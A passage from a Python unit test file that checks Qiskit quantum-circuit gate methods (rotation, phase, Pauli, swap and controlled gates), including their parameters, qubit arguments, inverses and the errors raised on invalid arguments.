self.assertRaises(QiskitError, qc.rz, 0, 'a')
def test_rz_reg(self):
instruction_set = self.circuit.rz(1, self.qr)
self.assertEqual(instruction_set.instructions[0].name, 'rz')
self.assertEqual(instruction_set.instructions[2].params, [1])
def test_rz_reg_inv(self):
instruction_set = self.circuit.rz(1, self.qr).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'rz')
self.assertEqual(instruction_set.instructions[2].params, [-1])
def test_rz_pi(self):
self.circuit.rz(pi / 2, self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'rz')
self.assertEqual(op.params, [pi / 2])
self.assertEqual(qargs, [self.qr[1]])
def test_rzz(self):
self.circuit.rzz(1, self.qr[1], self.qr[2])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'rzz')
self.assertEqual(op.params, [1])
self.assertEqual(qargs, [self.qr[1], self.qr[2]])
def test_rzz_wires(self):
self.circuit.rzz(1, 1, 2)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'rzz')
self.assertEqual(op.params, [1])
self.assertEqual(qargs, [self.qr[1], self.qr[2]])
def test_rzz_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.rzz, 1, self.cr[1], self.cr[2])
self.assertRaises(QiskitError, qc.rzz, 1, self.qr[0], self.qr[0])
self.assertRaises(QiskitError, qc.rzz, 1, .0, self.qr[0])
self.assertRaises(QiskitError, qc.rzz, 1, (self.qr, 3), self.qr[0])
self.assertRaises(QiskitError, qc.rzz, 1, self.cr, self.qr)
self.assertRaises(QiskitError, qc.rzz, 1, 'a', self.qr[1])
self.assertRaises(QiskitError, qc.rzz, 0.1, self.cr[1], self.cr[2])
self.assertRaises(QiskitError, qc.rzz, 0.1, self.qr[0], self.qr[0])
def test_s(self):
self.circuit.s(self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 's')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1]])
def test_s_wires(self):
self.circuit.s(1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 's')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1]])
def test_s_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.s, self.cr[0])
self.assertRaises(QiskitError, qc.s, self.cr)
self.assertRaises(QiskitError, qc.s, (self.qr, 3))
self.assertRaises(QiskitError, qc.s, (self.qr, 'a'))
self.assertRaises(QiskitError, qc.s, .0)
def test_s_reg(self):
instruction_set = self.circuit.s(self.qr)
self.assertEqual(instruction_set.instructions[0].name, 's')
self.assertEqual(instruction_set.instructions[2].params, [])
def test_s_reg_inv(self):
instruction_set = self.circuit.s(self.qr).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'sdg')
self.assertEqual(instruction_set.instructions[2].params, [])
def test_sdg(self):
self.circuit.sdg(self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'sdg')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1]])
def test_sdg_wires(self):
self.circuit.sdg(1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'sdg')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1]])
def test_sdg_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.sdg, self.cr[0])
self.assertRaises(QiskitError, qc.sdg, self.cr)
self.assertRaises(QiskitError, qc.sdg, (self.qr, 3))
self.assertRaises(QiskitError, qc.sdg, (self.qr, 'a'))
self.assertRaises(QiskitError, qc.sdg, .0)
def test_sdg_reg(self):
instruction_set = self.circuit.sdg(self.qr)
self.assertEqual(instruction_set.instructions[0].name, 'sdg')
self.assertEqual(instruction_set.instructions[2].params, [])
def test_sdg_reg_inv(self):
instruction_set = self.circuit.sdg(self.qr).inverse()
self.assertEqual(instruction_set.instructions[0].name, 's')
self.assertEqual(instruction_set.instructions[2].params, [])
def test_swap(self):
self.circuit.swap(self.qr[1], self.qr[2])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'swap')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1], self.qr[2]])
def test_swap_wires(self):
self.circuit.swap(1, 2)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'swap')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1], self.qr[2]])
def test_swap_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.swap, self.cr[1], self.cr[2])
self.assertRaises(QiskitError, qc.swap, self.qr[0], self.qr[0])
self.assertRaises(QiskitError, qc.swap, .0, self.qr[0])
self.assertRaises(QiskitError, qc.swap, (self.qr, 3), self.qr[0])
self.assertRaises(QiskitError, qc.swap, self.cr, self.qr)
self.assertRaises(QiskitError, qc.swap, 'a', self.qr[1])
self.assertRaises(QiskitError, qc.swap, self.qr, self.qr2[[1, 2]])
self.assertRaises(QiskitError, qc.swap, self.qr[:2], self.qr2)
def test_t(self):
self.circuit.t(self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 't')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1]])
def test_t_wire(self):
self.circuit.t(1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 't')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1]])
def test_t_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.t, self.cr[0])
self.assertRaises(QiskitError, qc.t, self.cr)
self.assertRaises(QiskitError, qc.t, (self.qr, 3))
self.assertRaises(QiskitError, qc.t, (self.qr, 'a'))
self.assertRaises(QiskitError, qc.t, .0)
def test_t_reg(self):
instruction_set = self.circuit.t(self.qr)
self.assertEqual(instruction_set.instructions[0].name, 't')
self.assertEqual(instruction_set.instructions[2].params, [])
def test_t_reg_inv(self):
instruction_set = self.circuit.t(self.qr).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'tdg')
self.assertEqual(instruction_set.instructions[2].params, [])
def test_tdg(self):
self.circuit.tdg(self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'tdg')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1]])
def test_tdg_wires(self):
self.circuit.tdg(1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'tdg')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1]])
def test_tdg_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.tdg, self.cr[0])
self.assertRaises(QiskitError, qc.tdg, self.cr)
self.assertRaises(QiskitError, qc.tdg, (self.qr, 3))
self.assertRaises(QiskitError, qc.tdg, (self.qr, 'a'))
self.assertRaises(QiskitError, qc.tdg, .0)
def test_tdg_reg(self):
instruction_set = self.circuit.tdg(self.qr)
self.assertEqual(instruction_set.instructions[0].name, 'tdg')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_tdg_reg_inv(self):
instruction_set = self.circuit.tdg(self.qr).inverse()
self.assertEqual(instruction_set.instructions[0].name, 't')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_u0(self):
self.circuit.u0(1, self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'u0')
self.assertEqual(op.params, [1])
self.assertEqual(qargs, [self.qr[1]])
def test_u0_wires(self):
self.circuit.u0(1, 1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'u0')
self.assertEqual(op.params, [1])
self.assertEqual(qargs, [self.qr[1]])
def test_u0_invalid(self):
qc = self.circuit
# CHECKME? self.assertRaises(QiskitError, qc.u0, self.cr[0], self.qr[0])
self.assertRaises(QiskitError, qc.u0, self.cr[0], self.cr[1])
self.assertRaises(QiskitError, qc.u0, self.qr[1], 0)
self.assertRaises(QiskitError, qc.u0, 0, self.cr[0])
self.assertRaises(QiskitError, qc.u0, 0, .0)
self.assertRaises(QiskitError, qc.u0, self.qr[2], self.qr[1])
self.assertRaises(QiskitError, qc.u0, 0, (self.qr, 3))
self.assertRaises(QiskitError, qc.u0, 0, self.cr)
# TODO self.assertRaises(QiskitError, qc.u0, 'a', self.qr[1])
self.assertRaises(QiskitError, qc.u0, 0, 'a')
def test_u0_reg(self):
instruction_set = self.circuit.u0(1, self.qr)
self.assertEqual(instruction_set.instructions[0].name, 'u0')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [1])
def test_u0_reg_inv(self):
instruction_set = self.circuit.u0(1, self.qr).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'u0')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [1])
def test_u0_pi(self):
qc = self.circuit
qc.u0(pi / 2, self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'u0')
self.assertEqual(op.params, [pi / 2])
self.assertEqual(qargs, [self.qr[1]])
def test_u1(self):
self.circuit.u1(1, self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'u1')
self.assertEqual(op.params, [1])
self.assertEqual(qargs, [self.qr[1]])
def test_u1_wires(self):
self.circuit.u1(1, 1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'u1')
self.assertEqual(op.params, [1])
self.assertEqual(qargs, [self.qr[1]])
def test_u1_invalid(self):
qc = self.circuit
# CHECKME? self.assertRaises(QiskitError, qc.u1, self.cr[0], self.qr[0])
self.assertRaises(QiskitError, qc.u1, self.cr[0], self.cr[1])
self.assertRaises(QiskitError, qc.u1, self.qr[1], 0)
self.assertRaises(QiskitError, qc.u1, 0, self.cr[0])
self.assertRaises(QiskitError, qc.u1, 0, .0)
self.assertRaises(QiskitError, qc.u1, self.qr[2], self.qr[1])
self.assertRaises(QiskitError, qc.u1, 0, (self.qr, 3))
self.assertRaises(QiskitError, qc.u1, 0, self.cr)
# TODO self.assertRaises(QiskitError, qc.u1, 'a', self.qr[1])
self.assertRaises(QiskitError, qc.u1, 0, 'a')
def test_u1_reg(self):
instruction_set = self.circuit.u1(1, self.qr)
self.assertEqual(instruction_set.instructions[0].name, 'u1')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [1])
def test_u1_reg_inv(self):
instruction_set = self.circuit.u1(1, self.qr).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'u1')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [-1])
def test_u1_pi(self):
qc = self.circuit
qc.u1(pi / 2, self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'u1')
self.assertEqual(op.params, [pi / 2])
self.assertEqual(qargs, [self.qr[1]])
def test_u2(self):
self.circuit.u2(1, 2, self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'u2')
self.assertEqual(op.params, [1, 2])
self.assertEqual(qargs, [self.qr[1]])
def test_u2_wires(self):
self.circuit.u2(1, 2, 1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'u2')
self.assertEqual(op.params, [1, 2])
self.assertEqual(qargs, [self.qr[1]])
def test_u2_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.u2, 0, self.cr[0], self.qr[0])
self.assertRaises(QiskitError, qc.u2, 0, self.cr[0], self.cr[1])
self.assertRaises(QiskitError, qc.u2, 0, self.qr[1], 0)
self.assertRaises(QiskitError, qc.u2, 0, 0, self.cr[0])
self.assertRaises(QiskitError, qc.u2, 0, 0, .0)
self.assertRaises(QiskitError, qc.u2, 0, self.qr[2], self.qr[1])
self.assertRaises(QiskitError, qc.u2, 0, 0, (self.qr, 3))
self.assertRaises(QiskitError, qc.u2, 0, 0, self.cr)
# TODO self.assertRaises(QiskitError, qc.u2, 0, 'a', self.qr[1])
self.assertRaises(QiskitError, qc.u2, 0, 0, 'a')
def test_u2_reg(self):
instruction_set = self.circuit.u2(1, 2, self.qr)
self.assertEqual(instruction_set.instructions[0].name, 'u2')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [1, 2])
def test_u2_reg_inv(self):
instruction_set = self.circuit.u2(1, 2, self.qr).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'u2')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [-pi - 2, -1 + pi])
def test_u2_pi(self):
self.circuit.u2(pi / 2, 0.3 * pi, self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'u2')
self.assertEqual(op.params, [pi / 2, 0.3 * pi])
self.assertEqual(qargs, [self.qr[1]])
def test_u3(self):
self.circuit.u3(1, 2, 3, self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'u3')
self.assertEqual(op.params, [1, 2, 3])
self.assertEqual(qargs, [self.qr[1]])
def test_u3_wires(self):
self.circuit.u3(1, 2, 3, 1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'u3')
self.assertEqual(op.params, [1, 2, 3])
self.assertEqual(qargs, [self.qr[1]])
def test_u3_invalid(self):
qc = self.circuit
# TODO self.assertRaises(QiskitError, qc.u3, 0, self.cr[0], self.qr[0])
self.assertRaises(QiskitError, qc.u3, 0, 0, self.cr[0], self.cr[1])
self.assertRaises(QiskitError, qc.u3, 0, 0, self.qr[1], 0)
self.assertRaises(QiskitError, qc.u3, 0, 0, 0, self.cr[0])
self.assertRaises(QiskitError, qc.u3, 0, 0, 0, .0)
self.assertRaises(QiskitError, qc.u3, 0, 0, self.qr[2], self.qr[1])
self.assertRaises(QiskitError, qc.u3, 0, 0, 0, (self.qr, 3))
self.assertRaises(QiskitError, qc.u3, 0, 0, 0, self.cr)
# TODO self.assertRaises(QiskitError, qc.u3, 0, 0, 'a', self.qr[1])
self.assertRaises(QiskitError, qc.u3, 0, 0, 0, 'a')
def test_u3_reg(self):
instruction_set = self.circuit.u3(1, 2, 3, self.qr)
self.assertEqual(instruction_set.instructions[0].name, 'u3')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [1, 2, 3])
def test_u3_reg_inv(self):
instruction_set = self.circuit.u3(1, 2, 3, self.qr).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'u3')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [-1, -3, -2])
def test_u3_pi(self):
self.circuit.u3(pi, pi / 2, 0.3 * pi, self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'u3')
self.assertEqual(op.params, [pi, pi / 2, 0.3 * pi])
self.assertEqual(qargs, [self.qr[1]])
def test_x(self):
self.circuit.x(self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'x')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1]])
def test_x_wires(self):
self.circuit.x(1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'x')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1]])
def test_x_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.x, self.cr[0])
self.assertRaises(QiskitError, qc.x, self.cr)
self.assertRaises(QiskitError, qc.x, (self.qr, 'a'))
self.assertRaises(QiskitError, qc.x, 0.0)
def test_x_reg(self):
instruction_set = self.circuit.x(self.qr)
self.assertEqual(instruction_set.instructions[0].name, 'x')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_x_reg_inv(self):
instruction_set = self.circuit.x(self.qr).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'x')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_y(self):
self.circuit.y(self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'y')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1]])
def test_y_wires(self):
self.circuit.y(1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'y')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1]])
def test_y_invalid(self):
qc = self.circuit
self.assertRaises(QiskitError, qc.y, self.cr[0])
self.assertRaises(QiskitError, qc.y, self.cr)
self.assertRaises(QiskitError, qc.y, (self.qr, 'a'))
self.assertRaises(QiskitError, qc.y, 0.0)
def test_y_reg(self):
instruction_set = self.circuit.y(self.qr)
self.assertEqual(instruction_set.instructions[0].name, 'y')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_y_reg_inv(self):
instruction_set = self.circuit.y(self.qr).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'y')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_z(self):
self.circuit.z(self.qr[1])
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'z')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1]])
def test_z_wires(self):
self.circuit.z(1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'z')
self.assertEqual(op.params, [])
self.assertEqual(qargs, [self.qr[1]])
def test_z_reg(self):
instruction_set = self.circuit.z(self.qr)
self.assertEqual(instruction_set.instructions[0].name, 'z')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_z_reg_inv(self):
instruction_set = self.circuit.z(self.qr).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'z')
self.assertEqual(instruction_set.qargs[1], [self.qr[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_broadcast_does_not_duplicate_instructions(self):
self.circuit.rz(0, range(6))
instructions = [inst for inst, qargs, cargs in self.circuit.data]
self.assertEqual(len(set(id(inst) for inst in instructions)), 6)
self.circuit.data = []
self.circuit.rz(0, self.qr)
instructions = [inst for inst, qargs, cargs in self.circuit.data]
self.assertEqual(len(set(id(inst) for inst in instructions)), 3)
class TestStandard2Q(QiskitTestCase):
"""Standard Extension Test. Gates with two Qubits"""
def setUp(self):
self.qr = QuantumRegister(3, "q")
self.qr2 = QuantumRegister(3, "r")
self.cr = ClassicalRegister(3, "c")
self.circuit = QuantumCircuit(self.qr, self.qr2, self.cr)
def test_barrier_reg_bit(self):
self.circuit.barrier(self.qr, self.qr2[0])
self.assertEqual(len(self.circuit), 1)
op, qargs, _ = self.circuit[0]
self.assertEqual(op.name, 'barrier')
self.assertEqual(qargs, [self.qr[0], self.qr[1], self.qr[2], self.qr2[0]])
def test_ch_reg_reg(self):
instruction_set = self.circuit.ch(self.qr, self.qr2)
self.assertEqual(instruction_set.instructions[0].name, 'ch')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_ch_reg_reg_inv(self):
instruction_set = self.circuit.ch(self.qr, self.qr2).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'ch')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_ch_reg_bit(self):
instruction_set = self.circuit.ch(self.qr, self.qr2[1])
self.assertEqual(instruction_set.instructions[0].name, 'ch')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_ch_reg_bit_inv(self):
instruction_set = self.circuit.ch(self.qr, self.qr2[1]).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'ch')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_ch_bit_reg(self):
instruction_set = self.circuit.ch(self.qr[1], self.qr2)
self.assertEqual(instruction_set.instructions[0].name, 'ch')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_crz_reg_reg(self):
instruction_set = self.circuit.crz(1, self.qr, self.qr2)
self.assertEqual(instruction_set.instructions[0].name, 'crz')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [1])
def test_crz_reg_reg_inv(self):
instruction_set = self.circuit.crz(1, self.qr, self.qr2).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'crz')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [-1])
def test_crz_reg_bit(self):
instruction_set = self.circuit.crz(1, self.qr, self.qr2[1])
self.assertEqual(instruction_set.instructions[0].name, 'crz')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [1])
def test_crz_reg_bit_inv(self):
instruction_set = self.circuit.crz(1, self.qr, self.qr2[1]).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'crz')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [-1])
def test_crz_bit_reg(self):
instruction_set = self.circuit.crz(1, self.qr[1], self.qr2)
self.assertEqual(instruction_set.instructions[0].name, 'crz')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [1])
def test_crz_bit_reg_inv(self):
instruction_set = self.circuit.crz(1, self.qr[1], self.qr2).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'crz')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [-1])
def test_cu1_reg_reg(self):
instruction_set = self.circuit.cu1(1, self.qr, self.qr2)
self.assertEqual(instruction_set.instructions[0].name, 'cu1')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [1])
def test_cu1_reg_reg_inv(self):
instruction_set = self.circuit.cu1(1, self.qr, self.qr2).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'cu1')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [-1])
def test_cu1_reg_bit(self):
instruction_set = self.circuit.cu1(1, self.qr, self.qr2[1])
self.assertEqual(instruction_set.instructions[0].name, 'cu1')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [1])
def test_cu1_reg_bit_inv(self):
instruction_set = self.circuit.cu1(1, self.qr, self.qr2[1]).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'cu1')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [-1])
def test_cu1_bit_reg(self):
instruction_set = self.circuit.cu1(1, self.qr[1], self.qr2)
self.assertEqual(instruction_set.instructions[0].name, 'cu1')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [1])
def test_cu1_bit_reg_inv(self):
instruction_set = self.circuit.cu1(1, self.qr[1], self.qr2).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'cu1')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [-1])
def test_cu3_reg_reg(self):
instruction_set = self.circuit.cu3(1, 2, 3, self.qr, self.qr2)
self.assertEqual(instruction_set.instructions[0].name, 'cu3')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [1, 2, 3])
def test_cu3_reg_reg_inv(self):
instruction_set = self.circuit.cu3(1, 2, 3, self.qr, self.qr2).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'cu3')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [-1, -3, -2])
def test_cu3_reg_bit(self):
instruction_set = self.circuit.cu3(1, 2, 3, self.qr, self.qr2[1])
self.assertEqual(instruction_set.instructions[0].name, 'cu3')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [1, 2, 3])
def test_cu3_reg_bit_inv(self):
instruction_set = self.circuit.cu3(1, 2, 3, self.qr, self.qr2[1]).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'cu3')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [-1, -3, -2])
def test_cu3_bit_reg(self):
instruction_set = self.circuit.cu3(1, 2, 3, self.qr[1], self.qr2)
self.assertEqual(instruction_set.instructions[0].name, 'cu3')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [1, 2, 3])
def test_cu3_bit_reg_inv(self):
instruction_set = self.circuit.cu3(1, 2, 3, self.qr[1], self.qr2).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'cu3')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [-1, -3, -2])
def test_cx_reg_reg(self):
instruction_set = self.circuit.cx(self.qr, self.qr2)
self.assertEqual(instruction_set.instructions[0].name, 'cx')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cx_reg_reg_inv(self):
instruction_set = self.circuit.cx(self.qr, self.qr2).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'cx')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cx_reg_bit(self):
instruction_set = self.circuit.cx(self.qr, self.qr2[1])
self.assertEqual(instruction_set.instructions[0].name, 'cx')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cx_reg_bit_inv(self):
instruction_set = self.circuit.cx(self.qr, self.qr2[1]).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'cx')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cx_bit_reg(self):
instruction_set = self.circuit.cx(self.qr[1], self.qr2)
self.assertEqual(instruction_set.instructions[0].name, 'cx')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cx_bit_reg_inv(self):
instruction_set = self.circuit.cx(self.qr[1], self.qr2).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'cx')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cy_reg_reg(self):
instruction_set = self.circuit.cy(self.qr, self.qr2)
self.assertEqual(instruction_set.instructions[0].name, 'cy')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cy_reg_reg_inv(self):
instruction_set = self.circuit.cy(self.qr, self.qr2).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'cy')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cy_reg_bit(self):
instruction_set = self.circuit.cy(self.qr, self.qr2[1])
self.assertEqual(instruction_set.instructions[0].name, 'cy')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cy_reg_bit_inv(self):
instruction_set = self.circuit.cy(self.qr, self.qr2[1]).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'cy')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cy_bit_reg(self):
instruction_set = self.circuit.cy(self.qr[1], self.qr2)
self.assertEqual(instruction_set.instructions[0].name, 'cy')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cy_bit_reg_inv(self):
instruction_set = self.circuit.cy(self.qr[1], self.qr2).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'cy')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cz_reg_reg(self):
instruction_set = self.circuit.cz(self.qr, self.qr2)
self.assertEqual(instruction_set.instructions[0].name, 'cz')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cz_reg_reg_inv(self):
instruction_set = self.circuit.cz(self.qr, self.qr2).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'cz')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cz_reg_bit(self):
instruction_set = self.circuit.cz(self.qr, self.qr2[1])
self.assertEqual(instruction_set.instructions[0].name, 'cz')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
self.assertEqual(instruction_set.instructions[2].params, [])
def test_cz_reg_bit_inv(self):
instruction_set = self.circuit.cz(self.qr, self.qr2[1]).inverse()
self.assertEqual(instruction_set.instructions[0].name, 'cz')
self.assertEqual(instruction_set.qargs[1], [self.qr[1], self.qr2[1]])
